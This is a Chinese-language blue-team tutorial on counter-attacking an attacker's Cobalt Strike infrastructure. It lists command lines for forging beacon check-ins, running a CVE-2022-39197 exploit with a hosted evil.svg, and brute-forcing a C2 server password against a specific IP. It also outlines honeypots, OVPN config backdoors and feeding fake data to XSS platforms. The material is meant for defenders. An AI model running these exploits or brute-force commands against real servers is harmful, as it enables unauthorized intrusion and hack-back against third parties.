➢ 蓝队技能-溯源反制-C2CS&应用平台

#溯源反制-远程控制工具-CobaltStrike

对抗Cobaltstrike中的手段：

1、伪造流量批量上线（欺骗防御）

条件：知道对方的CS的服务端地址，开启了http监听器

参考：https://mp.weixin.qq.com/s/i79ziHSIVaJ7mqBfnewRZQ

-抓包木马进程流量

会话删除掉后重发包可上线

 

-解密Cookie加密数据

https://github.com/Sentinel-One/CobaltStrikeParser

生成checksum8路径：d:\Python3.8\python.exe check_url.py

解密数据获取密钥：python parse_beacon_config.py mm7L --json > mm7L.json

 

-利用批量脚本重放上线

https://github.com/LiAoRJ/CS_fakesubmit

填写密钥及修改上线信息后启动脚本

d:\Python3.8\python.exe cs_fakesubmit.py

python parse_beacon_config.py mm7L --json > mm7L.json

 

 

2、利用漏洞（CVE-2022-39197）

条件：机器被CS控制的木马程序 Cobalt Strike <=4.7 XSS 操作过进程管理

• 获取真实ip地址

• 获取NTLM

• RCE

• SSRF

https://github.com/its-arun/CVE-2022-39197

取得红队木马样本开始操作如下：

-蓝队修改EXP里面的执行命令后编译（红队客户端触发的东西在这里修改）

修改：EvilJar/src/main/java/Exploit.java

-蓝队修改svg加载地址并架设Web服务（红队的CS服务器能访问的Web服务）

修改：evil.svg 指向url地址

python -m http.server 8888

-蓝队执行EXP调用后门上线，攻击者进程查看时触发

python cve-2022-39197.py beacon.exe http://可访问的WEB:8888/evil.svg

 

3、反制Server，爆破密码（通用）

条件：知道对方的CS的服务端地址

针对没有采用隐匿C2地址的技术导致的反制（后门样本被溯源到C2地址）

https://github.com/ryanohoro/csbruter

python csbruter.py 47.94.236.117 pass.txt

 

4、旁站反制

由于CS服务器经常会部署不止于CS服务端的应用，

还会搭建NPS,ARL灯塔等，可采用未授权或默认密码进行反制

例子：NPS未授权

https://github.com/weishen250/npscrack

https://mp.weixin.qq.com/s/ASrWlMM4QfnkqvAMVyN6GA

 

通过蜜罐反制

主要就是下述反制手段做操作

1. 可克隆相关系统页面，伪装“漏洞”系统

2. 互联网端投饵，一般会在Github、Gitee、Coding上投放蜜标（有可能是个单独的网站地址、也有可能是个密码本引诱中招）

3. 利用JSONP、XSS、CSRF等前端类漏洞获取访问蜜标的攻击者网络身份（网络画像） 

 

邮件钓鱼反制

安全防护基础较好的厂商，一般来说除了出动0day，物理近源渗透以外，最常见的就是邮件钓鱼了，在厂商收到邮件钓鱼的情况下，我们可以采取化被动为主动的方式，假装咬钩，实际上诱导攻击者进入蜜网。 

 

渗透工具漏洞

可以尝试挖掘蚁剑、冰蝎、菜刀、BurpSuite、SQLmap、AWVS的0day漏洞（需要一定的技术水平），或利用历史漏洞部署相关环境进行反打 

 

OpenVPN配置后门

OpenVPN配置文件（OVPN文件，是提供给OpenVPN客户端或服务器的配置文件）是可以修改添加命令的。 

 

盲打攻击反制

攻击者可能通过盲打漏洞方式来获取权限，一般盲打都具备一个数据回传接口（攻击者需要接收Cookie之类的数据），接口在JavaScript代码中是可以寻找到的，我们可以利用数据回传接口做以下两件事情，并后续引导攻击者进入我们部署好的蜜罐。

1. 打脏数据回传给XSS平台

2. 打虚假数据回传给XSS平台 

 

通过攻击服务器端口/Web等漏洞

攻击者可能是通过自己搭建的公网服务器进行攻击的，或者是通过此服务器与后门进行通讯。其中服务器可能运行诸多服务，且未打补丁或设置强密码，导致防守方可进行反打。